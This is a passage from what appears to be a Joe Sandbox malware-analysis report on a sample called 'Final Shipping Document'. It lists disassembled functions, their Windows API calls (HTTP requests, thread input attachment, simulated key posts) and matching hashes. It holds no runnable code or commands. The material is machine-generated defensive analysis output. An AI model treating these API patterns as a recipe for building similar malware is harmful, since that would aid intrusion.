                                                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00C0A1E1,?,00000001), ref: 00C0B21D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                            • String ID:
                                                            • API String ID: 2156557900-0
                                                            • Opcode ID: 5f313fcc12dd882cbb45eda731a08a60e92a70f55696d0b4da75d5e2ba6cc197
                                                            • Instruction ID: 347dfba4e476cece57e1e5f35bedfb7d50ee6a6deab1f17a71642c00cbd9d280
                                                            • Opcode Fuzzy Hash: 5f313fcc12dd882cbb45eda731a08a60e92a70f55696d0b4da75d5e2ba6cc197
                                                            • Instruction Fuzzy Hash: 2C31AB71510204BFDB10DF24DC89BAE7BB9BB61711F108409FA29E62D0D7B89E80CF60
                                                            APIs
                                                            • _free.LIBCMT ref: 00BD2C94
                                                              • Part of subcall function 00BD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000), ref: 00BD29DE
                                                              • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                            • _free.LIBCMT ref: 00BD2CA0
                                                            • _free.LIBCMT ref: 00BD2CAB
                                                            • _free.LIBCMT ref: 00BD2CB6
                                                            • _free.LIBCMT ref: 00BD2CC1
                                                            • _free.LIBCMT ref: 00BD2CCC
                                                            • _free.LIBCMT ref: 00BD2CD7
                                                            • _free.LIBCMT ref: 00BD2CE2
                                                            • _free.LIBCMT ref: 00BD2CED
                                                            • _free.LIBCMT ref: 00BD2CFB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 982dd32ede494c69e789583d43bdbfbe99cf7690923fca4ca8b089e5c0576dd7
                                                            • Instruction ID: fb7a87aa778442165bf61b72f21b847dcd549a0afc34707516f07539d131cc4d
                                                            • Opcode Fuzzy Hash: 982dd32ede494c69e789583d43bdbfbe99cf7690923fca4ca8b089e5c0576dd7
                                                            • Instruction Fuzzy Hash: B411A47A100148AFCB02EF54D892CDDBBA5FF15350F4144A6FA489F322EA35EE50AB90
                                                            APIs
                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00BA1459
                                                            • OleUninitialize.OLE32(?,00000000), ref: 00BA14F8
                                                            • UnregisterHotKey.USER32(?), ref: 00BA16DD
                                                            • DestroyWindow.USER32(?), ref: 00BE24B9
                                                            • FreeLibrary.KERNEL32(?), ref: 00BE251E
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00BE254B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                            • String ID: close all
                                                            • API String ID: 469580280-3243417748
                                                            • Opcode ID: 5e02c1d4ce2d21ab3039c960f2ebdc5954c7237c8d0d73dfa662b549494e4603
                                                            • Instruction ID: 72e37986d66f2f7beafa3f3cdf0458d02782c1b2ba25820020cce362db8d3ac6
                                                            • Opcode Fuzzy Hash: 5e02c1d4ce2d21ab3039c960f2ebdc5954c7237c8d0d73dfa662b549494e4603
                                                            • Instruction Fuzzy Hash: F8D147717052528FCB19EF19C999A69F7E4BF06700F1546EDE44AAB252CB30AD12CF50
                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C17FAD
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C17FC1
                                                            • GetFileAttributesW.KERNEL32(?), ref: 00C17FEB
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00C18005
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C18017
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C18060
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C180B0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFile
                                                            • String ID: *.*
                                                            • API String ID: 769691225-438819550
                                                            • Opcode ID: e1655895979c167bc7b971ce9d8c2a878a6acb725f6ae6ae466e1c758de1af42
                                                            • Instruction ID: 8f45ecc1b298dd8faa8edccc296a40e487c259da1927fd1e6b0f1cbe4a110947
                                                            • Opcode Fuzzy Hash: e1655895979c167bc7b971ce9d8c2a878a6acb725f6ae6ae466e1c758de1af42
                                                            • Instruction Fuzzy Hash: 4381A1725082059FCB20EF15C844AEEB7E8BF8A310F14499EF895D7250DB35DE89DB92
                                                            APIs
                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00BA5C7A
                                                              • Part of subcall function 00BA5D0A: GetClientRect.USER32(?,?), ref: 00BA5D30
                                                              • Part of subcall function 00BA5D0A: GetWindowRect.USER32(?,?), ref: 00BA5D71
                                                              • Part of subcall function 00BA5D0A: ScreenToClient.USER32(?,?), ref: 00BA5D99
                                                            • GetDC.USER32 ref: 00BE46F5
                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00BE4708
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00BE4716
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00BE472B
                                                            • ReleaseDC.USER32(?,00000000), ref: 00BE4733
                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00BE47C4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                            • String ID: U
                                                            • API String ID: 4009187628-3372436214
                                                            • Opcode ID: 64acd5e2da4083ffe0021c1bf883849b483acebacf5ed3077e1258ccff667d29
                                                            • Instruction ID: 8452f54488eec2a4442c97241c8e8175c56bf108d01ea65fc0ce1faacf5afcf8
                                                            • Opcode Fuzzy Hash: 64acd5e2da4083ffe0021c1bf883849b483acebacf5ed3077e1258ccff667d29
                                                            • Instruction Fuzzy Hash: 9271FD30404245EFCF218F65C984AAE7BF5FF4A320F1842E9ED565A2AAC7319D81DF90
                                                            APIs
                                                            • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00C135E4
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                            • LoadStringW.USER32(00C72390,?,00000FFF,?), ref: 00C1360A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: LoadString$_wcslen
                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                            • API String ID: 4099089115-2391861430
                                                            • Opcode ID: edd39ef11c7e80d9e3984bef36e88a24573a22e40a5cf295791e4689c00cfa33
                                                            • Instruction ID: 37781cfc86b801d781115f02b5d366ceb4c6ead135f02b8a91cce6c8d44f7a23
                                                            • Opcode Fuzzy Hash: edd39ef11c7e80d9e3984bef36e88a24573a22e40a5cf295791e4689c00cfa33
                                                            • Instruction Fuzzy Hash: 80518F71804249ABDF14EBA0CC82EEEBBB4EF05344F084165F515721A2EB301BD9EFA0
                                                            APIs
                                                              • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                              • Part of subcall function 00BB912D: GetCursorPos.USER32(?), ref: 00BB9141
                                                              • Part of subcall function 00BB912D: ScreenToClient.USER32(00000000,?), ref: 00BB915E
                                                              • Part of subcall function 00BB912D: GetAsyncKeyState.USER32(00000001), ref: 00BB9183
                                                              • Part of subcall function 00BB912D: GetAsyncKeyState.USER32(00000002), ref: 00BB919D
                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00C38B6B
                                                            • ImageList_EndDrag.COMCTL32 ref: 00C38B71
                                                            • ReleaseCapture.USER32 ref: 00C38B77
                                                            • SetWindowTextW.USER32(?,00000000), ref: 00C38C12
                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00C38C25
                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00C38CFF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                            • API String ID: 1924731296-2107944366
                                                            • Opcode ID: a2347fb42a8c88022e72bbcba38c8af231e74de3af3b9bb477bb33af0172c3b5
                                                            • Instruction ID: 4a09a0bbef16721c231b1223e4610f9e0500be8558a0a9da1ead2df16e67a8d3
                                                            • Opcode Fuzzy Hash: a2347fb42a8c88022e72bbcba38c8af231e74de3af3b9bb477bb33af0172c3b5
                                                            • Instruction Fuzzy Hash: 89518A71118300AFD714DF24DC96FAE77E4FB88754F000669F996A72E1DB70AA48CB62
                                                            APIs
                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C1C272
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C1C29A
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C1C2CA
                                                            • GetLastError.KERNEL32 ref: 00C1C322
                                                            • SetEvent.KERNEL32(?), ref: 00C1C336
                                                            • InternetCloseHandle.WININET(00000000), ref: 00C1C341
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                            • String ID:
                                                            • API String ID: 3113390036-3916222277
                                                            • Opcode ID: d99c11a14377d03f8b51ed6d09c8955a9d96fba440a1545c9c527939d2734898
                                                            • Instruction ID: 43c373ca05f8a833bd47568cf31d34750a4522ad20b8cc30b9639c473c7b76f7
                                                            • Opcode Fuzzy Hash: d99c11a14377d03f8b51ed6d09c8955a9d96fba440a1545c9c527939d2734898
                                                            • Instruction Fuzzy Hash: 7F317FB1540604AFD7219F658CC8BEF7BFCEB4A744B50851DF466E2210DB34DD84AB61
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00BE3AAF,?,?,Bad directive syntax error,00C3CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00C098BC
                                                            • LoadStringW.USER32(00000000,?,00BE3AAF,?), ref: 00C098C3
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C09987
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadMessageModuleString_wcslen
                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                            • API String ID: 858772685-4153970271
                                                            • Opcode ID: e23770f2c4a3f14ae9485b0bd1c7a0db96be3c838e862ad99609c9f28c18164a
                                                            • Instruction ID: 3031df925eec97c3373fc1ed15a3900313ca1329fe2fe2723cdc50b16c8df036
                                                            • Opcode Fuzzy Hash: e23770f2c4a3f14ae9485b0bd1c7a0db96be3c838e862ad99609c9f28c18164a
                                                            • Instruction Fuzzy Hash: 4C218D3280421AABCF21EF90CC46FFE77B5FF19700F0444A9F519620A2EB719A18DB50
                                                            APIs
                                                            • GetParent.USER32 ref: 00C020AB
                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00C020C0
                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C0214D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameParentSend
                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                            • API String ID: 1290815626-3381328864
                                                            • Opcode ID: 227279cb58b36dfabb14001c06c358b9f6576c76bbd28bc007b2821b71e470c7
                                                            • Instruction ID: 86aa876274cba66310217bf5ca4596f8970e40f212179290039f60adc982f531
                                                            • Opcode Fuzzy Hash: 227279cb58b36dfabb14001c06c358b9f6576c76bbd28bc007b2821b71e470c7
                                                            • Instruction Fuzzy Hash: 2B113676288306BAFA252220DC0BEAE73ECCB04324F20006AFB04A40D1EB616D029614
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                            • String ID:
                                                            • API String ID: 1282221369-0
                                                            • Opcode ID: d0ac4ccd9508d6bf6c56b781e454d6c9d12a8fd4b175fcc0db79791fe53c6927
                                                            • Instruction ID: e40bd1277902ec4af53692416abe08fffaafe8b42ae8396c1e549099cd966c53
                                                            • Opcode Fuzzy Hash: d0ac4ccd9508d6bf6c56b781e454d6c9d12a8fd4b175fcc0db79791fe53c6927
                                                            • Instruction Fuzzy Hash: 7B610FB1904342AFDB21AFB49895BADFFE5EF11310F1441EBE94497382F6319905D790
                                                            APIs
                                                            • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00C35186
                                                            • ShowWindow.USER32(?,00000000), ref: 00C351C7
                                                            • ShowWindow.USER32(?,00000005,?,00000000), ref: 00C351CD
                                                            • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00C351D1
                                                              • Part of subcall function 00C36FBA: DeleteObject.GDI32(00000000), ref: 00C36FE6
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C3520D
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C3521A
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C3524D
                                                            • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00C35287
                                                            • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00C35296
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                            • String ID:
                                                            • API String ID: 3210457359-0
                                                            • Opcode ID: 70c767354c786eb493d6b5e8408d1ebef5a7283c1981828c5c3fdb32de1a9d74
                                                            • Instruction ID: 0a701ac7875dbd9aa212af1eae6d7abc91ada1c5eb15c2b32a1ca358d5cb0327
                                                            • Opcode Fuzzy Hash: 70c767354c786eb493d6b5e8408d1ebef5a7283c1981828c5c3fdb32de1a9d74
                                                            • Instruction Fuzzy Hash: 2C519230A60A08BFEF209F25CC4ABDD3BA5FB05361F144511FA25962E1C776AA90DB41
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00BF6890
                                                            • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00BF68A9
                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00BF68B9
                                                            • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00BF68D1
                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00BF68F2
                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00BB8874,00000000,00000000,00000000,000000FF,00000000), ref: 00BF6901
                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00BF691E
                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00BB8874,00000000,00000000,00000000,000000FF,00000000), ref: 00BF692D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                            • String ID:
                                                            • API String ID: 1268354404-0
                                                            • Opcode ID: 69cae79b3289c9fb076b3cbcdd8eb27668ec76e2d1874a1765f6e5168c77be0a
                                                            • Instruction ID: 6d3394f21100f192ecedfa5e8cbc6f5dc5eea187f5ff9a7fab5d25e5f88b46b9
                                                            • Opcode Fuzzy Hash: 69cae79b3289c9fb076b3cbcdd8eb27668ec76e2d1874a1765f6e5168c77be0a
                                                            • Instruction Fuzzy Hash: 05517B70610209EFDB20CF24CC95BBE7BF9EB48760F144558FA16A72A0DBB1E990DB50
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C1C182
                                                            • GetLastError.KERNEL32 ref: 00C1C195
                                                            • SetEvent.KERNEL32(?), ref: 00C1C1A9
                                                              • Part of subcall function 00C1C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C1C272
                                                              • Part of subcall function 00C1C253: GetLastError.KERNEL32 ref: 00C1C322
                                                              • Part of subcall function 00C1C253: SetEvent.KERNEL32(?), ref: 00C1C336
                                                              • Part of subcall function 00C1C253: InternetCloseHandle.WININET(00000000), ref: 00C1C341
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                            • String ID:
                                                            • API String ID: 337547030-0
                                                            • Opcode ID: 8b8a0cb086132a2fe04efceae8a259efb65511a9cbb3bf70d37dc46a513857e9
                                                            • Instruction ID: ebb8405c13f216b9efa6889b3dea77051d9b7e10140b0d73302e672544ff93a4
                                                            • Opcode Fuzzy Hash: 8b8a0cb086132a2fe04efceae8a259efb65511a9cbb3bf70d37dc46a513857e9
                                                            • Instruction Fuzzy Hash: 1D318F71280601BFDB219FA5DC84BAFBBF9FF1A300B10841DF96692610D731E954EB60
                                                            APIs
                                                              • Part of subcall function 00C03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C03A57
                                                              • Part of subcall function 00C03A3D: GetCurrentThreadId.KERNEL32 ref: 00C03A5E
                                                              • Part of subcall function 00C03A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C025B3), ref: 00C03A65
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C025BD
                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C025DB
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00C025DF
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C025E9
                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C02601
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00C02605
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C0260F
                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C02623
                                                            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00C02627
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
